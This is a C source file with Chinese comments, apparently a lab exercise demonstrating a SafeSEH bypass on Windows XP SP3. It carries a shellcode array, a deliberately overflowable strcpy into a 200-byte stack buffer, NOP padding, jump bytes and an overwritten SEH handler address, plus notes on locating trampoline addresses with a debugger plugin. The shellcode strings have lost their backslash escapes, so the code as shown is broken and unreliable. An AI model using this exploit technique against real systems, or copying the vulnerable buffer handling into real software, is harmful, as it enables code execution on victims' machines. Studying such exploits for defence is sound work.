/*
XP SP3
VS2008 SafeSEH 保护
利用程序的 map状态的的映射文件
把它当成跳板 跳向我们的shellcode执行
*/
#include <stdafx.h>
#include <windows.h>
char shellcode[]=
"xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
"x53"
"x68x64x61x30x23"
"x68x23x50x61x6E"
"x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8"//168
"x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90"
"xE9x29xFFxFFxFFx90x90x90xEBxF6"
"x0Bx0Bx28x00"
;
DWORD MyException(void)
{
printf("There is an exception");
getchar();
return 1;
}
void test(char * input)
{
char str[200];
strcpy(str,input);
int zero=0;
__try
{
zero=1/zero;
}
__except(MyException())
{
}
}
int _tmain(int argc, _TCHAR* argv[])
{
//__asm int 3
test(shellcode);
return 0;
}
ctrl+M 可以看到除了 EXE 和DLL模块之外的内存映射(类型为mao) 可以无视 SafeSEH的
下载插件 OllyFindAddr 可以在整个程序内存空间搜索 call/jmp dword ptr[ebp+n]
http://bbs.pediy.com/showthread.php?t=136464
如果SEH是这个地址的话 恰好 可以调到 SEH的下一指针上
我们寻找的地址跳向 -》 SEH下一指针 然后这个指针上 不能直接跳向shellcode
因为直接 EB xxxxxxx 是5字节 会淹没我们的 SEH 那就会失败了
所以只有向上跳8字节 然后再跳向 shellcode起始地址就行了
